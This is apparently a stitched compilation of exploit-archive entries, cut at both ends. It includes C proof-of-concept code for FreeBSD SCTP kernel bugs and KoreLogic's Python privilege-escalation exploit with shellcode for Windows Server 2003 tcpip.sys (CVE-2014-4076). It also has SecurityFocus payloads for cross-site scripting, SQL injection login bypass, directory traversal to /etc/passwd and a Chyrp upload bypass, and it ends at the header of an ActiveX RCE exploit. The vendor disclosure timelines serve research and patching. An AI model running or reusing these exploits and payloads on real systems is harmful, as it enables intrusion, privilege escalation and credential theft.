addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(ADDR);
if (connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("connect");
goto out;
}
/* Set up the stcb->asoc.ss_functions struct with the function pointers belonging to the SCTP_SS_PRIORITY socket option */
memset(&assoc_value, 0, sizeof(assoc_value));
assoc_value.assoc_value = SCTP_SS_PRIORITY;
assoc_value.assoc_id = SCTP_CURRENT_ASSOC;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_PLUGGABLE_SS, &assoc_value, (socklen_t)sizeof(struct sctp_assoc_value)) < 0){
perror("setting up function pointers");
goto out;
}
memset(&stream_value, 0, sizeof(stream_value));
stream_value.assoc_id = SCTP_CURRENT_ASSOC;
/*
* stream_id will be used as an index into the stcb->asoc.strmout array without performing bounds checking.
* stream_value will be written to the calculated address.
*/
stream_value.stream_id = 0xFFFF;
stream_value.stream_value = 0x4142;
/* Triggering the vulnerability... */
if (setsockopt(fd, IPPROTO_SCTP, SCTP_SS_VALUE, &stream_value, (socklen_t)sizeof(struct sctp_stream_value)) < 0){
perror("triggering the vulnerability");
goto out;
}
out:
if (close(fd) < 0) {
perror("close");
}
return(0);
}
-----/
The following code is a Proof of Concept for the third vulnerability:
/-----
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <netinet/sctp_uio.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define PORT 4444
#define ADDR "127.0.0.1"
int main(int argc, char *argv[]) {
int fd;
struct sockaddr_in addr;
struct sctp_initmsg init;
struct sctp_stream_value stream_value;
struct sctp_assoc_value assoc_value;
socklen_t opt_len;
printf("** FreeBSD SCTP Socket SCTP_SS_VALUE Kernel Memory Disclosure Vulnerability **\n");
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) < 0) {
perror("socket");
goto out;
}
memset(&init, 0, sizeof(init));
init.sinit_num_ostreams = 2048;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_INITMSG, &init, (socklen_t)sizeof(struct sctp_initmsg)) < 0) {
perror("SCTP_INITMSG");
goto out;
}
memset(&addr, 0, sizeof(addr));
#ifdef HAVE_SIN_LEN
addr.sin_len = sizeof(struct sockaddr_in);
#endif
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(ADDR);
if (connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("connect");
goto out;
}
/* Set up the stcb->asoc.ss_functions struct with the function pointers belonging to the SCTP_SS_PRIORITY socket option */
memset(&assoc_value, 0, sizeof(assoc_value));
assoc_value.assoc_value = SCTP_SS_PRIORITY;
assoc_value.assoc_id = SCTP_CURRENT_ASSOC;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_PLUGGABLE_SS, &assoc_value, (socklen_t)sizeof(struct sctp_assoc_value)) < 0){
perror("setting up function pointers");
goto out;
}
memset(&stream_value, 0, sizeof(stream_value));
opt_len = sizeof(stream_value);
stream_value.assoc_id = SCTP_CURRENT_ASSOC;
/* stream_id will be used as an index into the stcb->asoc.strmout array without performing bounds checking. */
stream_value.stream_id = 0x400;
/* Triggering the vulnerability... */
if (getsockopt(fd, IPPROTO_SCTP, SCTP_SS_VALUE, &stream_value, &opt_len) < 0){
perror("triggering the vulnerability");
goto out;
}
printf("[*] Value leaked from kernel: 0x%04X\n", stream_value.stream_value);
out:
if (close(fd) < 0) {
perror("close");
}
return(0);
}
-----/
Note that both the second and third PoCs try to connect to a dummy SCTP server listening on localhost on port 4444, since the SCTP socket needs to be in a 'connected' state in order to trigger the vulnerabilities. The following code, based on the example code published here[5], can be used to run a simple SCTP server listening on port 4444:
/-----
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#define BUFFER_SIZE (1<<16)
#define PORT 4444
#define ADDR "127.0.0.1"
int main(int argc, char *argv[]) {
int fd, n, flags;
struct sockaddr_in addr;
socklen_t from_len;
struct sctp_sndrcvinfo sinfo;
char buffer[BUFFER_SIZE];
struct sctp_event_subscribe event;
if ((fd = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP)) < 0) {
perror("socket");
goto out;
}
memset(&event, 1, sizeof(struct sctp_event_subscribe));
if (setsockopt(fd, IPPROTO_SCTP, SCTP_EVENTS, &event, sizeof(struct sctp_event_subscribe)) < 0) {
perror("setsockopt");
goto out;
}
memset(&addr, 0, sizeof(struct sockaddr_in));
#ifdef HAVE_SIN_LEN
addr.sin_len = sizeof(struct sockaddr_in);
#endif
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(ADDR);
if (bind(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("bind");
goto out;
}
if (listen(fd, 1) < 0) {
perror("listen");
goto out;
}
while (1) {
flags = 0;
memset(&addr, 0, sizeof(struct sockaddr_in));
from_len = (socklen_t)sizeof(struct sockaddr_in);
memset(&sinfo, 0, sizeof(struct sctp_sndrcvinfo));
n = sctp_recvmsg(fd, (void *)buffer, BUFFER_SIZE, (struct sockaddr *)&addr, &from_len, &sinfo, &flags);
if (flags & MSG_NOTIFICATION) {
printf("Notification received.\n");
} else {
printf("Msg of length %d received from %s:%u on stream %d, PPID %d.\n", n, inet_ntoa(addr.sin_addr), ntohs(addr.sin_port),sinfo.sinfo_stream, ntohl(sinfo.sinfo_ppid));
}
}
out:
if (close(fd) < 0) {
perror("close");
}
return (0);
}
-----/
9. *Report Timeline*
. 2015-01-15:
Initial notification sent to FreeBSD. Publication date set to Feb 16, 2015.
. 2015-01-15:
FreeBSD confirms reception of the report and requests the draft version of the advisory. They clarify that they usually aim for Tuesday releases depending on the severity of the problem.
. 2015-01-15:
Core Security sends a draft version of the advisory to the vendor and requests to be informed once they finish reviewing the vulnerabilities.
. 2015-01-26:
Core Security requests a status report regarding their review of the vulnerabilities and the estimated publication date.
. 2015-01-26:
FreeBSD confirms the bugs, but informs us that they'll only publish a security advisory for the SCTP Socket SCTP_SS_VALUE Memory Corruption and Kernel Memory Disclosure vulnerabilities. For the "vt Driver VT_WAITACTIVE Sign Conversion Vulnerability" they will commit a normal change and then release an "Errata Notice" informing the fix. They set the publication date for 27th January, 2015.
. 2015-01-26:
Core Security informs that understands their position regarding the vt Driver VT_WAITACTIVE Sign Conversion issue, but we will nevertheless publish thew bug in the advisory because we consider it a vulnerability. We accepted their offer of sharing CVE IDs.
. 2015-01-26:
FreeBSD confirms they have available CVE IDs and ask if we want to use IDs from 2014 or 2015.
. 2015-01-27:
FreeBSD informs us that after going through their mail archive they found out that the same issue was reported by Google and that they missed it. They inform us that they will use only one CVE ID for the two SCTP issues because they state they are of the same nature.
. 2015-01-27:
Core Security informs that will assign a the CVE ID CVE-2014-0998 to the vt(4) vulnerability and we requested the date and time they plan to release the fix and advisory.
. 2015-01-27:
FreeBSD informs they will publish the fix and advisory today.
. 2015-01-27:
Advisory CORE-2015-0003 published.
10. *References*
[1] https://www.freebsd.org/releases/10.1R/relnotes.html#new
[2] https://www.freebsd.org/cgi/man.cgi?query=vt&sektion=4
[3] https://wiki.freebsd.org/Newcons
[4] https://www.freebsd.org/cgi/man.cgi?query=sctp&sektion=4
[5] http://www.bsdcan.org/2008/schedule/attachments/44_bsdcan_sctp.pdf
[6] https://security.FreeBSD.org/advisories/FreeBSD-SA-15:02.kmem.asc
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2015 Core Security and (c) 2015 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security advisories
team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
"""
KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation
Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-001
Publication Date: 2015.01.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt
1. Vulnerability Details
Affected Vendor: Microsoft
Affected Product: TCP/IP Protocol Driver
Affected Version: 5.2.3790.4573
Platform: Microsoft Windows Server 2003 Service Pack 2
Architecture: x86, x64, Itanium
Impact: Privilege Escalation
Attack vector: IOCTL
CVE-ID: CVE-2014-4076
2. Vulnerability Description
The tcpip.sys driver fails to sufficiently validate memory
objects used during the processing of a user-provided IOCTL.
3. Technical Description
By crafting an input buffer that will be passed to the Tcp
device through the NtDeviceIoControlFile() function, it
is possible to trigger a vulnerability that would allow an
attacker to elevate privileges.
This vulnerability was discovered while fuzzing the tcpip.sys
driver. A collection of IOCTLs that could be targeted was
obtained and subsequently fuzzed. During this process, one of
the crashes obtained originated from the IOCTL 0x00120028.
This was performed on an x86 installation of Windows Server
2003, Service Pack 2.
ErrCode = 00000000
eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270
eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
tcpip!SetAddrOptions+0x1d:
f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:00000028=????????
A second chance exception has occurred during a mov
instruction. This instruction is attempting to copy a pointer
value from an un-allocated address space. Since no pointer
can be found, an exception is generated.
Let's begin by reviewing the call stack:
kd> kv
*** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr Args to Child
f620a9dc f67e416b f620aa34 00000022 00000004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo])
f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo])
f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo])
f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo])
f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo])
f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo])
f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo])
f620ab5c 808e912e 000006f4 00000000 00000000 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo])
f620ab90 f55c10fa 000006f4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo])
The nt!NtDeviceIoControlFile() function was called, creating
a chain of subsequent function calls that eventually led to
the tcpip!SetAddrOptions() function being called.
By de-constructing the call to nt!NtDeviceIoControlFile() we
can derive all required information to re-create this exception.
0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a
eax=00000000 ebx=8c785070 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
nt!NtDeviceIoControlFile+0x2a:
808e912e 5d pop ebp
kd> db [ebp+2C] L?0x4
b940dd60 00 00 00 00 ....
kd> db [ebp+28] L?0x4
b940dd5c 00 00 00 00 ....
kd> db [ebp+24] L?0x4
b940dd58 20 00 00 00 ...
kd> db [ebp+20] L?0x4
b940dd54 00 11 00 00 ....
kd> db [ebp+1c] L?0x4
b940dd50 28 00 12 00 (...
kd> db [ebp+18] L?0x4
b940dd4c 58 4f bd 00 XO..
kd> db [ebp+14] L?0x4
b940dd48 00 00 00 00 ....
kd> db [ebp+10] L?0x4
b940dd44 00 00 00 00 ....
kd> db [ebp+0c] L?0x4
b940dd40 00 00 00 00 ....
kd> db [ebp+8] L?0x4
b940dd3c b8 06 00 00 ....
The inputBuffer for this call references memory at 0x1000 with
a length of 0x20.
kd> db 0x1100 L?0x20
00001100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00 ................
00001110 22 00 00 00 04 00 00 00-00 00 01 00 00 00 00 00 "...............
After review of the tcpip.sys driver, some memory trickery
was created to control the code flow until the instruction
pointer could be controlled in a way that would be beneficial
to an attacker.
kd> db 0x28 L?0x11
00000028 87 ff ff 38 00 00 00 00-00 00 00 00 00 00 00 00 ...8............
00000038 01
eax=00000000 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=0000002a esp=b940db3c ebp=b940db60 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
0000002a ff ???
Since the instruction pointer now contains 0x0000002a,
exploitation becomes trivial. Merely allocating the desired
payload for execution at this memory address will allow for
unprivileged users to run their payload within a privileged
process.
4. Mitigation and Remediation Recommendation
The vendor has issued a patch for this
vulnerability, the details of which are presented
in the vendor's public acknowledgment MS14-070
(https://technet.microsoft.com/library/security/MS14-070).
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft requests PoC.
2014.04.29 - KoreLogic resends PoC from the initial contact
email.
2014.04.29 - Microsoft acknowledges receipt of vulnerability
report.
2014.04.29 - Microsoft opens case 19010 (MSRC 0050929) to
investigate the vulnerability.
2014.04.30 - Microsoft informs KoreLogic that the case is
actively being investigated.
2014.05.30 - Microsoft informs KoreLogic that the case is
actively being investigated.
2014.06.11 - KoreLogic informs Microsoft that 30 business days
have passed since vendor acknowledgment of the
initial report. KoreLogic requests CVE number for
the vulnerability, if there is one. KoreLogic
also requests vendor's public identifier for the
vulnerability along with the expected disclosure
date.
2014.06.24 - KoreLogic informs Microsoft that no response was
received following the 06.11.14 email. KoreLogic
requests CVE number for the vulnerability, if
there is one. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.06.24 - Microsoft replies to KoreLogic that they have
reproduced the vulnerability and are determining
how to proceed with the supplied information.
They are not able to provide a CVE or an expected
disclosure date.
2014.07.02 - 45 business days have elapsed since Microsoft
acknowledged receipt of the vulnerability report
and PoC.
2014.07.17 - KoreLogic requests CVE number for the
vulnerability. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.08.18 - Microsoft notifies KoreLogic that they have a CVE
but are not willing to share it with KoreLogic at
this time.
2014.09.08 - KoreLogic requests CVE number for the
vulnerability. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.09.11 - Microsoft responds saying that the vulnerability
is expected to be disclosed in "a Fall release"
and that "it is currently looking good for
October." Does not provide CVE.
2014.09.24 - Microsoft informs KoreLogic that there was a
packaging issue and that the patch will be pushed
to November.
2014.11.03 - Microsoft confirms the patch will ship in November.
2014.11.11 - Vulnerability publicly disclosed by Microsoft as
issue MS14-070 with CVE-2014-4076.
2015.01.28 - KoreLogic releases advisory.
7. Exploit
"""
#!/usr/bin/python2
#
# KL-001-2015-001 / MS14-070 / CVE-2014-4076
# Microsoft Windows Server 2003 x86 Tcpip.sys Privilege Escalation
# Matt Bergin @ KoreLogic / Level @ Smash the Stack
# shout out to bla
#
from optparse import OptionParser
from subprocess import Popen
from os.path import exists
from struct import pack
from time import sleep
from ctypes import *
from sys import exit
CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory =
windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory
DeviceIoControlFile,CloseHandle = windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
def spawn_process(path):
process = Popen([path],shell=True)
pid = process.pid
return
def main():
print "CVE-2014-4076 x86 exploit, Level\n"
global pid, process
parser = OptionParser()
parser.add_option("--path",dest="path",help="path of process to start and elevate")
parser.add_option("--pid",dest="pid",help="pid of running process to elevate")
o,a = parser.parse_args()
if (o.path == None and o.pid == None):
print "[!] no path or pid set"
exit(1)
else:
if (o.path != None):
if (exists(o.path) != True):
print "[!] path does not exist"
exit(1)
else:
Thread(target=spawn_process,args=(o.path),name='attacker-cmd').start()
if (o.pid != None):
try:
pid = int(o.pid)
except:
print "[!] could not convert PID to an interger."
exit(1)
while True:
if ("pid" not in globals()):
sleep(1)
else:
print "[+] caught attacker cmd at %s, elevating now" % (pid)
break
buf =
"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
sc =
"\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"
sc = sc.replace("\x41\x41\x41\x41",pack('<L',pid))
sc = sc.replace("\x11\x11\x11\x11","\x39\xff\xa2\xba")
sc = sc.replace("\x22\x22\x22\x22","\x00\x00\x00\x00")
handle = CreateFileA("\\\\.\\Tcp",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[!] could not open handle into the Tcp device"
exit(1)
print "[+] allocating memory"
ret_one = NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x4000)),0x1000|0x2000,0x40)
if (ret_one != 0):
print "[!] could not allocate memory..."
exit(1)
print "[+] writing relevant memory..."
ret_two = WriteProcessMemory(-1, 0x28, "\x87\xff\xff\x38", 4, byref(c_int(0)))
ret_three = WriteProcessMemory(-1, 0x38, "\x00"*2, 2, byref(c_int(0)))
ret_four = WriteProcessMemory(-1, 0x1100, buf, len(buf), byref(c_int(0)))
ret_five = WriteProcessMemory(-1, 0x2b, "\x00"*2, 2, byref(c_int(0)))
ret_six = WriteProcessMemory(-1, 0x2000, sc, len(sc), byref(c_int(0)))
print "[+] attack setup done, crane kick!"
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0)
CloseHandle(handle)
exit(0)
if __name__=="__main__":
main()
"""
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
"""
source: https://www.securityfocus.com/bid/48642/info
The Alice Modem is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability because the device fails to properly handle user-supplied input.
An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/natAdd?apptype=userdefined&rulename=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=99
http://www.example.com/natAdd?apptype=userdefined&rulename=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+y=&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=199&protocol1=proto_6&extportstart1=1&extportend1=1&intportstart1=1&intportend1=1&protocol2=proto_6&extportstart2=&extportend2=&intportstart2=&intportend2=&protocol3=proto_6&extportstart3=&extportend3=&intportstart3=&intportend3=
source: https://www.securityfocus.com/bid/48647/info
Sphider is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example input is available:
Username: ' or 0=0 #
Password: ' or 0=0 #
source: https://www.securityfocus.com/bid/48651/info
Flowplayer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Flowplayer 3.2.7 is vulnerable; other versions may also be affected.
http://www.example.com/flowplayer/flowplayer-3.2.7.swf?config={%22clip%22:{%22url%22:%22http://www.example.com/vod/demo.flowplayervod/flowplayer-700.flv%22,%20%22linkUrl%22:%22javascript:alert%28String.fromCharCode%2888,83,83%29%29;alert%28document.cookie%29%22},%22screen%22:{%22height%22:%22100pct%22,%22top%22:0},%22plugins%22:{%22controls%22:{%22timeColor%22:%22#ffffff%22,%22borderRadius%22:%220px%22,%22buttonOffColor%22:%22rgba%28130,130,130,1%29%22,%22bufferGradient%22:%22none%22,%22sliderColor%22:%22#000000%22,%22zIndex%22:1,%22backgroundColor%22:%22rgba%280,%200,%200,%200%29%22,%22scrubberHeightRatio%22:0.6,%22tooltipTextColor%22:%22#ffffff%22,%22volumeSliderGradient%22:%22none%22,%22spacing%22:{%22time%22:6,%22volume%22:8,%22all%22:2},%22sliderGradient%22:%22none%22,%22timeBorderRadius%22:20,%22timeBgHeightRatio%22:0.8,%22volumeSliderHeightRatio%22:0.6,%22progressGradient%22:%22none%22,%22height%22:26,%22volumeColor%22:%22#4599ff%22,%22tooltips%22:{%22marginBottom%22:5,%22buttons%22:false},%22timeSeparator%22:%22%20%22,%22name%22:%22controls%22,%22volumeBarHeightRatio%22:0.2,%22opacity%22:1,%22timeFontSize%22:12,%22left%22:%2250pct%22,%22tooltipColor%22:%22rgba%280,%200,%200,%200%29%22,%22bufferColor%22:%22#a3a3a3%22,%22volumeSliderColor%22:%22#ffffff%22,%22border%22:%220px%22,%22buttonColor%22:%22#ffffff%22,%22durationColor%22:%22#b8d9ff%22,%22autoHide%22:{%22enabled%22:true,%22hideDelay%22:500,%22hideStyle%22:%22fade%22,%22mouseOutDelay%22:500,%22hideDuration%22:400,%22fullscreenOnly%22:true},%22backgroundGradient%22:%22none%22,%22width%22:%22100pct%22,%22sliderBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22display%22:%22block%22,%22buttonOverColor%22:%22#ffffff%22,%22url%22:%22flowplayer.controls-3.2.5.swf%22,%22timeBorder%22:%220px%20solid%20rgba%280,%200,%200,%200.3%29%22,%22progressColor%22:%22#4599ff%22,%22timeBgColor%22:%22rgb%280,%200,%200,%200%29%22,%22scrubberBarHeightRatio%22:0.2,%22bottom%22:0,%22builtIn%22:false,%22volumeBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22margins%22:[2,12,2,12]}}}
source: https://www.securityfocus.com/bid/48669/info
TCExam is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
TCExam 11.2.009, 11.2.010 and 11.2.011 are vulnerable; other versions may also be affected.
XSS: GET http://www.example.com/tcexam/admin/code/{script}.php?{parameter}={value}"><script>alert(1)</script>
XSS: POST http://www.example.com/tcexam/admin/code/{script}.php HTTP/1.0
- {parameter}={value}<script>alert(1)</script>&{parameter}={value}
XSS URI: GET http://www.example.com/tcexam/admin/code/index.php?zsl=>"><script>alert(1)</script>
XSS Path: GET http://www.example.com/tcexam/admin/code/?=>"'><script>alert(1)</script>
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin/help.php?title=[XSS]&body=[XSS]
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.comincludes/javascript.php?action=[XSS]
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
C:
Appended ;*.php in script for the add photo feather (http://www.example.com/admin/?action=write_post&feather=photo) using intercepting proxy
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",
file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>
<!DOCTYPE HTML>
<!--
###############################################################################
*
* Exploit Title: X360 VideoPlayer ActiveX Control RCE Full ASLR & DEP Bypass
* Author: Rh0
* Date: Jan 30 2015
* Affected Software: X360 VideoPlayer ActiveX Control 2.6 (VideoPlayer.ocx)
* Vulnerability: Buffer Overflow in Data Section
* Tested on: Internet Explorer 10 32-bit (Windows 7 64-bit in VirtualBox)
* Software Links:
http://www.x360soft.com/demo/videoplayersetup.exe
http://download.cnet.com/X360-Video-Player-ActiveX-Control/3000-2170_4-10581185.html
* Detailed writeup: https://rh0dev.github.io/blog/2015/fun-with-info-leaks/
*
###############################################################################
* Information about VideoPlayer.ocx *
###################################
